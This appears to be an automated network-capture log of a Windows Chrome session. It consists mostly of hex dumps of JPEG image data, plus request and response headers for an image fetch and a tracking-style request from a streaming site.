                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: ef 2c 40 b3 84 3f 95 3c 4f 1f 61 d4 2f 99 89 88 5f bc a7 07 61 13 d3 aa 6b 33 ae df fa 41 2b da 9a 4a fe 55 13 8b 5f e1 3d ea 26 91 90 f6 96 f9 6f 78 82 09 e2 6f 95 dc ab d8 f5 ff 00 22 f6 d3 bc c6 ba 7f 96 b2 c3 b3 eb ba c0 fe 28 bb a6 db 86 6d c2 ea 43 89 87 73 27 85 cd f9 7b 9b da de d2 ba b9 66 66 ae 3f 69 6d 86 c6 d4 ad 45 a2 d1 fe db 1c 44 c7 1d e3 d1 bc 76 34 b2 7d 50 ce a7 88 c7 b9 8d e4 f2 c6 a7 ac db 45 89 b1 8a f3 1c 80 e4 b5 8f c9 a9 2c d3 5d 9d b6 cb 8e b3 1e 58 a2 30 56 ec d9 4a 01 1b 65 37 69 f2 96 4d 3c 63 ae a6 2d 72 ba c0 e5 c4 33 ba 03 68 3b ad 3a 95 a4 20 d5 9e f0 3b 2f 55 8f 81 5f 82 4a 85 2b 3c f6 83 58 f4 2b 78 b5 0d 47 69 27 c4 71 dc c3 cb 1e d3 53 6a 2d ee cc 60 1a a7 21 c8 45 1a ca d2 0e d3 a7 bf cd df ea 27 69 bb 55 8b de 66 d5
                                                                                                                                                                                          Data Ascii: ,@?<Oa/_ak3A+JU_=&oxo"(mCs'{ff?imEDv4}PE,]X0VJe7iM<c-r3h;: ;/U_J+<X+xGi'qSj-`!E'iUf
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: dd 3f 10 7f 70 9f ea 34 63 fe 49 a0 cd 5d cb 9f f3 74 a6 dd 44 d9 d5 4c 44 19 b6 f5 6c 66 9a 6a 63 9f 48 bb 11 ec 66 d2 2e 4d a9 ae dc ec a6 b2 ba c0 18 e7 ea 6d 92 cf a9 a0 9c 60 1f 50 d0 6b 32 31 0d 49 55 aa 1b 53 df 1e a3 90 c1 17 2e 81 4d b6 20 7a fb 46 1f ba 88 fa 4e 18 75 c8 a6 12 59 db 5e e2 50 4f a6 6e ab 31 6e fc be e3 1c 22 7e 75 83 50 dd f8 8b fe bb 88 c7 58 0f eb 89 e0 2c a1 45 ce 95 1c 8a 1a 86 2b 35 65 20 8c 9c b6 c9 2a cc a4 a9 33 17 ce 1c 7f 33 10 eb 62 4c c3 a5 b6 6b 91 99 6d 5d 25 5f 88 df 2e c8 7b 31 91 d8 b1 f1 09 59 67 d4 d0 4e 27 c4 ae a2 e2 89 f1 8c 89 77 17 b2 86 a3 75 d9 39 35 d9 5e cc a4 14 57 a6 3f 16 b3 4c ab c4 ea c2 7f 73 11 46 ab 06 7d a3 38 55 3e 2f 7e e2 26 26 65 d6 ee b2 cb 78 d5 ce 4e 99 3b f2 c6 24 e2 39 f6 d3 7b a2 af
                                                                                                                                                                                          Data Ascii: ?p4cI]tDLDlfjcHf.Mm`Pk21IUS.M zFNuY^POn1n"~uPX,E+5e *33bLkm]%_.{1YgN'wu95^W?LsF}8U>/~&&exN;$9{
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: 20 21 31 13 04 30 22 41 42 60 71 ff da 00 08 01 02 01 01 08 00 a7 63 43 c7 39 3b 14 32 2f 13 95 76 93 29 94 cd d2 7d 0a cb fe db 6c b6 5b 2d 9b 8d c6 e1 d1 63 c9 4a c5 9e d1 8d 74 c8 cd f8 f4 6d 9b a6 6e 67 a6 d3 70 97 f2 b3 73 37 09 a1 c9 21 48 b6 fc 72 ea 84 ba 17 4c fa 1f 54 7d 10 d6 e3 71 b8 dc 59 7a 6f a1 fe 42 5e ad ac f9 a1 2a 12 1c 44 8a 28 6f b1 63 77 7a 57 37 89 31 46 a4 55 89 69 5a 39 51 6d 8f 1d f0 72 a2 59 98 bf 2d 11 9a 97 9a b1 59 b5 af 4d e6 e4 7a 57 19 ba 43 90 fb 31 65 70 90 9d ae 09 77 c2 84 b9 4e 36 89 46 98 8d a9 18 33 6e 54 f5 b2 ef 93 63 91 b8 52 b3 24 5f a9 27 37 4e 70 71 91 f2 b5 71 84 d4 19 19 ee 56 bf 43 1b a1 e4 3e 84 66 4f 33 8f 90 6d f6 65 5d 8a 6d 12 74 60 4f e6 b8 5f 27 11 c1 8d 91 66 55 d5 90 93 51 46 55 6e c5 17 74 4a 2d
                                                                                                                                                                                          Data Ascii: !10"AB`qcC9;2/v)}l[-cJtmngps7!HrLT}qYzoB^*D(ocwzW71FUiZ9QmrY-YMzWC1epwN6F3nTcR$_'7NpqqVC>fO3me]mt`O_'fUQFUntJ-
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: c1 13 40 42 53 92 d1 e1 23 f0 f1 50 72 82 04 33 54 62 a2 c2 ff da 00 08 01 01 00 09 3f 02 19 28 28 28 20 85 61 00 82 82 08 20 85 77 89 a8 10 9a bb c2 c4 2c 33 0a 0a 11 41 42 27 24 10 50 50 50 a8 28 20 a0 a4 84 7a 0e f4 43 a0 c2 e0 d6 f6 cc 7f 60 28 6d d2 44 92 6e 6b 61 f6 4e 6b da 4c 22 db a1 e6 b6 60 f8 f0 d9 f1 45 b8 91 b7 03 03 0e f5 01 ec a3 b4 48 b8 ca 1c d6 c7 42 11 06 3e 7c 16 cb 9b 49 81 6e 4a 45 51 02 48 bf a3 b5 97 ac d0 df 6e e6 4d 39 72 4e a3 78 6e 2d 6e 3a a0 d2 1a 45 c7 13 9e 2b 61 ce 23 11 83 79 cd 38 3b 1c 01 6c 20 9c c6 17 60 c3 79 5d 07 88 ed 46 ff 00 dc 53 db 16 e3 46 9c 18 c1 99 11 50 b8 ef 0c d1 81 a9 9b 7b 27 a3 1e 4a 8d ac 76 42 06 f8 dd e0 bd 98 00 6f 5f e5 15 06 ec fb 38 b3 18 f7 ad 96 b5 b8 bd de 81 10 76 6e 8b 70 31 54 4c dd c4
                                                                                                                                                                                          Data Ascii: @BS#Pr3Tb?((( a w,3AB'$PPP( zC`(mDnkaNkL"`EHB>|InJEQHnM9rNxn-n:E+a#y8;l `y]FSFP{'JvBo_8vnp1TL
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: 05 78 70 11 e1 56 79 c9 7c 35 7c 8f 4a a7 5e e7 c1 38 f0 e0 8d 57 16 62 de d7 10 bc 90 cc 55 8c 17 c9 f4 ab e3 2b b8 e4 54 6e 43 24 17 66 92 ae d0 58 c4 a7 40 7b 36 a7 94 62 7d a5 73 35 1b a0 dc b8 27 0d 15 ed 75 18 88 5f aa ca 4d db b1 e0 56 05 e3 da 4d bc 39 2e d5 5f 23 d1 4c 23 d1 8c b8 23 3c 93 a1 46 cc 4c 31 e0 17 44 64 20 84 5e e0 70 e6 8c 00 86 48 f8 23 77 c4 d8 5e cf c2 77 82 ed 1a be 47 a2 e0 bb 4b 72 8d d1 89 f8 4c 51 e5 75 c5 3b c1 1f 04 71 c6 e5 7c 06 d5 19 98 cd 14 43 69 73 8e 0f ef 9a a1 10 0d de c7 0a be 69 ae 66 a9 33 ca af 94 16 7e 1c 96 78 8c 8a bc 47 a4 33 69 ab fe 3f a2 98 5d af 45 73 5a 4e d3 a4 84 28 d9 80 f5 57 92 b7 8e 2e 95 f8 04 3f 55 80 7f 98 fc 55 78 38 89 ab e8 dc 6e 32 e0 57 6c d5 ff 00 1f d2 ae d2 c5 c4 b9 de 8b 73 27 66 cf
                                                                                                                                                                                          Data Ascii: xpVy|5|J^8WbU+TnC$fX@{6b}s5'u_MVM9._#L##<FL1Dd ^pH#w^wGKrLQu;q|Cisif3~xG3i?]EsZN(W.?UUx8n2Wls'f
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: 74 d2 06 43 67 ac f7 43 35 f7 9f 01 1c fa 20 60 ac cb 48 54 cc 79 16 9e a0 11 63 63 28 13 a6 8d 69 d9 fc a1 d7 4d de 92 08 03 77 a9 73 d1 f8 2a 6b a5 99 db 44 ea b0 f9 80 21 81 fd d4 7a fd 47 bb 29 c3 5d ea 80 cb 95 3a 74 98 b7 89 e1 f6 85 8d c3 ba 53 cb 53 23 4a 86 ba 92 be 1c 63 00 41 f5 81 bf 61 03 40 b0 34 17 a3 02 f6 85 15 8d 80 a0 05 5b e3 68 45 32 16 23 46 c0 e5 99 9c 24 c4 cb 8e f7 cc ac a1 84 64 17 b0 61 8b c1 3a c8 fa 82 4b 0e c9 8e 34 b8 76 1f 8f 9e d3 34 24 bd a3 46 af 85 1e e8 e3 fb 95 b2 08 2f 68 19 02 b2 d0 db 30 f7 52 38 04 8f 49 1b 8f 8e c7 8f 51 0d 90 95 29 a5 f2 7b c7 ee 13 6c 6d 36 98 19 4c 70 5a da ce 21 63 d9 99 a5 be e2 22 6b c0 40 a3 a8 1f 71 3b 92 51 a2 bf dd cb c6 d9 8a af ee 18 cf de 7b 5a 31 1c 1b a7 78 18 70 4d f3 64 e7 20 6c
                                                                                                                                                                                          Data Ascii: tCgC5 `HTycc(iMws*kD!zG)]:tSS#JcAa@4[hE2#F$da:K4v4$F/h0R8IQ){lm6LpZ!c"k@q;Q{Z1xpMd l
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: 09 5b da 32 b5 88 1d 9f b3 3c a6 f2 bd 05 c1 d3 1f 81 42 3a 4f 74 c7 a4 54 3a dd 21 73 18 88 02 3c 18 67 3a 4a 08 22 d6 6a 40 db f9 19 8d 76 e9 38 7d 6a 18 3a 1e a5 c0 dc 14 6a 30 4c 3b 7f 66 53 9c a1 ae 9a 74 3d 1c 08 0a 37 5b 74 30 e9 83 8d c2 09 0f a6 d8 d8 c5 a1 b6 70 41 51 ad 10 a4 59 8a b3 1d 41 8b d0 6b fd 97 9d a1 af ed b0 fc c2 03 e8 84 11 cd 7e cc 57 79 d3 1d 36 fc 01 c2 d6 1c 05 fa ca 2a 28 08 71 b2 98 b6 84 10 48 cc d9 82 09 10 8e cb 36 22 66 c2 77 88 a2 63 ee 0c 72 76 98 61 61 da c1 12 46 d1 20 c2 f9 86 2f c4 44 a0 85 5d 3f 66 63 c3 1d 0f e0 5d 2d 11 e8 21 19 80 83 e4 84 56 04 12 50 8c 99 54 37 98 82 2a 07 95 88 0d cb 48 04 a1 81 f6 88 99 73 28 08 6d c1 10 8e 3c bd 50 0b 6d 05 0d a0 90 73 ac 26 62 1b 86 28 25 98 87 44 28 2e df b3 18 f7 9f 71
                                                                                                                                                                                          Data Ascii: [2<B:OtT:!s<g:J"j@v8}j:j0L;fSt=7[t0pAQYAk~Wy6*(qH6"fwcrvaaF /D]?fc]-!VPT7*Hs(m<Pms&b(%D(.q


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          123192.168.2.1649863151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:15 UTC445OUTGET /images/M/MV5BZGEyNDljMjQtZGI0Ni00ZWM0LWI5NjktMjNiMmI1YmZiOTIxXkEyXkFqcGdeQXVyNTAyODkwOQ@@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:15 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 29274
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 5efaf52b-28f2-4af2-b27c-8e025ddc929c
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Mon, 18 Jul 2016 08:04:59 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Fri, 04 Nov 2044 03:42:34 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 2155366
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:15 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kiad7000144-IAD, cache-ewr-kewr1740052-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 87 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 00 07 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 03 04 05 06 07 01 08 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f2 cc bc 6a d7 ee 65 de f1 3e 15 eb
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"6je>
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: 7d ba 4b 26 8e bc 5f 11 0f 3a 04 1f 3a 00 00 00 00 00 73 a0 00 21 c0 33 8f 9c 45 ca af 17 63 88 ba 35 d8 9b 04 45 95 c0 46 4d 44 5b 5c 70 57 97 55 58 a3 4d d6 f6 d8 63 97 b2 71 9d 7a 8a b5 b5 82 0b 89 fa f6 d3 92 32 e2 bb b1 39 71 a1 d7 6b 9a 2d 99 0c a7 53 55 00 00 00 00 00 00 00 00 00 00 00 00 03 9d 28 44 42 cc c2 5c 44 c2 cb c1 df 54 54 44 94 55 b5 24 dd d5 26 f8 53 52 70 96 cb b9 c0 18 74 1c 36 4d 92 8d 39 5d 92 3e b7 f2 86 b1 9a 3e 9a 97 a5 dc f9 53 e8 02 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 37 71 1e dc 6c 4b f8 6b a3 1b 05 29 09 7d 51 ac 1d 34 ba 96 99 44 e5 63 6b 58 a9 1e c9 70 1b 80 42 9f 85 90 8f d1 42 a9 c8 2a 99 ed 87 a4 b5 9f 12 7a 6b 98 6c 62 12 6f 9d 68 00 20 00 00 00 00 00 00 79 bf 4e f0 4d 3a 7d fb 7b f9 e9 f4 26 75 98 01 3a b9 0e
                                                                                                                                                                                          Data Ascii: }K&_::s!3Ec5EFMD[\pWUXMcqz29qk-SU(DB\DTTDU$&SRpt6M9]>>S7qlKk)}Q4DckXpBB*zklboh yNM:}{&u:
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: 76 7e 93 74 b3 86 db 5a 96 3a 7d 23 df f5 fd 18 cb a8 7a 4e 1e 9d 33 dd f4 ab 85 01 de c0 8b 50 f8 8e f1 bb 77 83 bc db 1b b7 2a eb b8 e6 b6 21 f0 15 f0 c7 bc e9 bc 7d 2e ff 00 27 44 c7 e9 e8 2e 96 52 f5 fd a7 a2 ba 2e 92 e1 2c a5 eb c6 ea a8 7b 7e ad a3 7a fb bc ce 66 26 39 11 34 c3 f7 2b 96 78 69 89 c1 c7 7b 65 f7 ad 03 2f a9 e2 15 59 5b 81 a3 40 95 56 06 a3 56 ba 72 bb ec ad 6f 01 60 4c 76 1b 66 82 e6 bc b6 48 da d3 4e 1a cb 2c 62 06 18 88 d8 50 49 d0 6e 70 6c 62 bb 5b 13 85 e7 f7 73 c5 ce 11 22 7d 57 9f 0e f1 6c f1 31 38 86 93 a2 55 96 12 07 9d 68 16 9a 90 05 0b 80 12 f4 72 55 78 80 4d f8 5b 1b 79 cf b7 4b fe 5a e5 83 b3 41 38 2f 9b 65 b4 2d dd 9f 57 a0 a9 6a 72 bc 33 5c 00 e9 3b d6 1f b1 a4 04 f8 4d b3 53 f0 ae c6 9c 36 9d 94 88 57 31 2b d8 00 96 0c
                                                                                                                                                                                          Data Ascii: v~tZ:}#zN3Pw*!}.'D.R.,{~zf&94+xi{e/Y[@VVro`LvfHN,bPInplb[s"}Wl18UhrUxM[yKZA8/e-Wjr3\;MS6W1+
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: 4f 8c 1b 67 c6 7c 67 c6 1c 4c fb f3 c8 c1 c8 72 c7 26 59 8c 73 c4 af 4a a6 ac 9d 1d 02 de a4 af 46 8e 46 ed 15 2b a8 dd bd 34 c3 a3 63 be 9a 80 f5 97 9e 91 0d 96 22 d7 5d 56 de aa a3 48 87 66 7d 2a ef 45 27 48 bf 33 35 7a 75 ab 38 7a c2 d7 53 41 a7 53 54 ba b0 3a 38 7a 2a dd 65 60 69 53 ae 2b 94 e9 eb 74 16 fb 04 13 3c cc c7 2c 4f 1f c0 38 85 8a 53 09 66 c0 e2 51 ab 34 60 4e ba e1 95 2d d6 35 9b f2 97 28 4e 9b fa 93 bc bc a3 75 6c 2c 5a b5 2e 82 2e a7 6b 07 54 d5 15 af a7 2d b9 6c c9 83 52 02 04 23 88 38 22 1d 46 55 44 6d 5e 77 19 eb 4f da 2e a9 93 66 3d e0 72 c7 b3 70 83 13 0b 3e 31 76 c5 db 17 6c f8 4c 88 1c 4e a4 ea 88 2e 9d 49 d4 9d 59 d5 9b f1 37 cd eb 37 24 6d 93 15 c2 95 cd 89 36 57 3a 6b 0d 62 61 61 c4 ed 04 f3 31 ec aa be a3 6d 0c 3c 75 86 93 46
                                                                                                                                                                                          Data Ascii: Og|gLr&YsJFF+4c"]VHf}*E'H35zu8zSAST:8z*e`iS+t<,O8SfQ4`N-5(Nul,Z..kT-lR#8"FUDm^wO.f=rp>1vlLN.IY77$m6W:kbaa1m<uF
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: c0 62 c4 76 46 ff 00 20 9d 40 d5 58 39 08 9e 5e 38 cc b5 f7 06 c4 55 ed bb 95 7a 72 9b 18 f8 95 de df 18 ce d6 7d e0 f6 0f 69 e4 3b 10 62 9d c3 22 db 36 45 18 f1 c2 75 3d 0a f3 05 a3 5a 1e 9b 01 c9 c4 b1 4a 76 1a 0e 20 8a 3a 6e 1d 1b c1 d4 a2 fc 88 74 b5 df 6d b8 2f 91 ac b9 5d 13 1e 1f 92 fe 63 78 32 cf a3 72 ff 00 b6 90 0c e0 4d 9d 88 84 75 10 40 3f 9c f6 ef 0f 7f 9c fb 00 26 9f b2 80 be a3 a2 ca 4d bf 17 96 af 57 70 85 48 01 5b 51 a6 0c 77 01 48 af 22 23 ee 68 3c e4 b9 ce d3 1f f0 60 8b fe b1 fc 19 8f c4 f1 1f eb 50 94 0f 94 3d fd eb 58 09 82 cb 83 ed c7 b3 be 67 99 42 0c ef 35 59 bd 55 85 d6 8a d4 b3 28 ae bf 99 03 7b 96 87 b0 39 6a cd 8f 91 7a b2 0d d1 ae cf 80 91 47 e4 dd f5 68 f6 f4 f1 93 70 42 60 b4 58 c3 19 8c fe 66 c6 75 ae 2e 9c d1 86 f7 8e e4
                                                                                                                                                                                          Data Ascii: bvF @X9^8Uzr}i;b"6Eu=ZJv :ntm/]cx2rMu@?&MWpH[QwH"#h<`P=XgB5YU({9jzGhpB`Xfu.
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: 69 36 3d 09 b2 33 4b 35 2e 9b e9 29 b5 6b 2c 96 7f 3f 1f b2 53 c2 f1 8c 3e 70 47 ce 0a ec 70 53 7c 14 5c e7 e9 ed 9e 81 cf 4f 83 82 b7 19 e2 03 39 51 8b 2a 67 91 30 4c 06 0b 2b 9f 9f 91 c7 da 58 0b fc 83 17 68 ee 26 d7 f4 3d 87 3f 8f 3c b9 dc f9 c3 e7 69 ce dc ec cf 16 78 b0 c1 86 13 9e 23 8b 1c a7 e1 6b d7 31 a7 f2 23 ec 13 0a 67 ae a7 f3 eb 2e 78 e2 e0 9c e2 1e d2 73 88 b8 24 3c f0 a4 6f 2b 0e a4 a5 f3 91 6f a9 4d 2a 45 1b ec ea c6 8a ec fb 5a c8 a8 d8 db ba 48 aa e7 d6 4c f0 20 c0 a0 67 19 c6 0c f2 aa 0f e5 ee c7 fd 7b a9 9e e8 c5 64 fe b8 4e 79 c0 10 2f 01 d6 36 8d a3 27 59 53 b9 9b 16 8d 48 e5 f3 46 da da 4e 58 bf e9 b4 46 0d 76 bc 0e 0f b9 1f 00 67 b9 16 0b 31 9f c0 ce 30 47 96 d3 e4 1c 25 46 79 07 f4 66 23 8c 57 ee 52 53 d8 7c f6 5b 3d 86 cf 61 b3
                                                                                                                                                                                          Data Ascii: i6=3K5.)k,?S>pGpS|\O9Q*g0L+Xh&=?<ix#k1#g.xs$<o+oM*EZHL g{dNy/6'YSHFNXFvg10G%Fyf#WRS|[=a
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: 62 40 34 64 9d a4 6e cd e3 79 2c 9b 3d 45 29 59 69 37 45 9d 9e b8 36 2d 07 7b 55 dc 72 af da 48 f2 ad f9 62 75 44 e4 af 48 81 15 3d 70 2b a6 eb 46 0d a9 27 c5 a5 12 d8 6b 21 22 11 dd 69 01 b2 2b 99 64 9a 3b eb 3c 22 31 c9 2d 95 98 1b 15 ec 6c 74 3e 37 8c e1 54 b6 03 fd e5 6e 5d 61 8f a1 9f 96 79 be 02 73 e0 28 12 4f 69 a7 7e ec 8f d5 d5 b2 d7 20 b3 f5 ea 9c dc 41 15 18 73 91 28 3d 4f 33 2f a7 d3 3f c8 a2 f8 26 d5 d5 9a 73 22 c1 ce 56 ea ab 27 23 ca a5 9e a9 1a ca 51 83 00 c0 80 47 89 5f e0 0c 1e 3b e7 aa 33 d6 19 eb 8c f5 7f f3 d4 39 ea 1c d9 cf 4d 8e 1a ed 9e dd b3 db 13 86 a3 e4 0e 7a 68 f6 cd e3 c4 49 ec 02 31 3a c1 4c ff 00 7e d5 06 0a d1 e7 a7 18 c3 d7 3b 0c ec 33 be 7a 83 3d 41 9e ae 09 30 38 cf b3 19 87 f4 1b c1 93 3b fc 81 9d f0 30 ce d8 7f d1 5c
                                                                                                                                                                                          Data Ascii: b@4dny,=E)Yi7E6-{UrHbuDH=p+F'k!"i+d;<"1-lt>7Tn]ays(Oi~ As(=O3/?&s"V'#QG_;39MzhI1:L~;3z=A08;0\
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: f1 34 bc 76 c7 a4 3a 5e f6 72 b7 46 09 bb f7 8c 02 69 dc a0 d1 a4 cd d6 87 15 dd 74 79 d4 21 30 53 05 03 d3 bb 0a c1 72 66 18 94 cb af 6d 5f ee 31 84 9a 09 96 87 fd 27 f2 83 99 db 33 60 7b 89 f6 4c bb 6b c2 ed 32 3e f1 81 f7 43 a3 40 60 73 cd 02 d3 aa 1d 14 c1 8e 5e e9 98 0e e9 aa 17 99 12 c4 6c 4c 17 d2 5e e9 92 1c f5 50 53 25 62 50 3d 27 49 03 3c 94 47 8e a3 fc bd d7 67 ff 00 24 ff 00 b5 3f ed 4d 74 99 38 39 07 1c 68 b9 41 aa ec e3 8f 53 fa 4f 17 26 9a 6b 55 d2 e0 7d 91 37 9b 74 7c f2 4d b5 ab d1 21 a9 c3 04 db 5a d8 fb cd 88 79 26 da f9 b9 36 d7 cd c9 b2 e0 43 eb 04 d9 71 4d b5 f3 72 24 bc 19 ec 72 31 06 3b 1c b4 c1 4e bb 02 ee cd 12 e2 f4 d1 e0 a2 31 f7 5d 9c 71 c9 0e 25 44 75 bd a3 35 56 10 79 84 33 41 c5 99 b2 68 a6 0a c1 57 93 6b 85 ac 16 9c 3d 57
                                                                                                                                                                                          Data Ascii: 4v:^rFity!0Srfm_1'3`{Lk2>C@`s^lL^PS%bP='I<Gg$?Mt89hASO&kU}7t|M!Zy&6CqMr$r1;N1]q%Du5Vy3AhWk=W
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: f2 fa 76 7c de 9a 71 74 9d c5 4f 15 8a a3 96 3c df 13 3e 56 1e 9e 1f 3c e4 81 66 73 b4 13 bb e8 fe ec 10 70 67 1a a8 11 44 4f fb 81 97 a8 b4 d0 df aa e4 e3 b5 bf da ab d6 28 4a 8f 72 37 43 d1 26 10 42 6b c2 11 04 e0 e7 34 0a 6a f6 e7 2b db 53 45 c6 8f 82 63 ed e8 1f 65 7a ec 27 85 54 90 90 8d 72 b3 e7 a2 8e df 6e aa 50 7d 98 0b 5a bb 18 17 c0 bf 65 57 78 9d d8 e4 f5 33 2d fe c8 74 40 1a 85 42 82 fe e5 02 cb 02 34 21 98 f0 46 83 7b c2 0b 12 b0 69 7c 7a c4 f3 69 c1 0f 45 06 40 74 20 fc 57 bf 57 32 6c 2e 58 c4 a1 78 e0 26 85 d2 85 7d 14 ef b5 b5 77 47 13 f8 b3 3d 10 98 c9 50 aa 36 cf 9b dd b9 61 e5 66 2b 62 96 38 e5 66 36 6e 8d 9d d6 5d 37 3b 48 94 d1 6b 33 0d 3a cf 65 18 ef b2 74 08 ef f9 04 c7 6e 38 43 e5 14 1f 2f 9b 11 87 08 41 1a bd f8 62 85 d9 c6 85 34
                                                                                                                                                                                          Data Ascii: v|qtO<>V<fspgDO(Jr7C&Bk4j+SEcez'TrnP}ZeWx3-t@B4!F{i|ziE@t WW2l.Xx&}wG=P6af+b8f6n]7;Hk3:etn8C/Ab4
                                                                                                                                                                                          2024-12-15 11:38:15 UTC1378INData Raw: cb 35 a6 e5 7f 73 12 d1 2d c7 b4 60 fe b1 29 c2 97 93 5a ef 35 60 13 f7 88 63 6b 55 ed c7 bc 62 a6 cd 06 2b 68 a3 cf 2d 6d 99 76 fc ee 7d fe e6 5f 3c f7 4d 17 bf 1e 48 61 73 5d 6e f7 bf df 42 54 3a 23 eb ef 29 0e 6f e6 7f 94 94 16 0e 7a 6b 98 d1 2b 6a 6f db 52 64 93 f9 32 6f bc cb 50 95 c0 69 d9 5b ed 04 5d 6e 4f 0c 15 ba 34 78 72 25 85 f3 1b 58 7b ab 3f 10 09 a0 00 7a 62 35 d9 a3 eb 8d bd 25 e5 a5 85 f7 70 43 3a 24 47 d6 7e b1 43 5f ab 2c b5 c7 3a 76 40 26 86 9e b9 be f7 cc 75 38 3f 07 bb 5f 79 6f dd a1 3c 7c 3e cc 3e c1 05 fd 6c cb 5f 4d 97 14 a5 b5 6f 89 53 38 67 e5 e7 d8 fc 71 32 31 7e 02 40 cb 4d 3d e8 b6 c1 97 e0 ed da 59 6d 15 db b8 9a 30 57 72 96 99 5e cd d3 cc b9 99 52 ea 9b 83 7e bc 37 35 5f 39 3f db 25 e6 83 4b 90 6b a8 6e 00 f4 94 12 0a 5c e8
                                                                                                                                                                                          Data Ascii: 5s-`)Z5`ckUb+h-mv}_<MHas]nBT:#)ozk+joRd2oPi[]nO4xr%X{?zb5%pC:$G~C_,:v@&u8?_yo<|>>l_MoS8gq21~@M=Ym0Wr^R~75_9?%Kkn\


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          124192.168.2.1649864172.67.183.1594436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:15 UTC720OUTGET /U1VLT0N8aig8fgECPxsZFBN4Gi4ZMR18CTAMJwkSNzl+PhUFAG07Kjdoen96YG1yd2UjPC9ycmtzODsiJyA4cnJ1PCUpLG5zPXJyfWVlfW1mcz5ycnUhOy4kbmRtPzcnOXZ+dGBheXlxZWJ8fHpm HTTP/1.1
                                                                                                                                                                                          Host: bineukdwithme.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:15 UTC766INHTTP/1.1 204 No Content
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:15 GMT
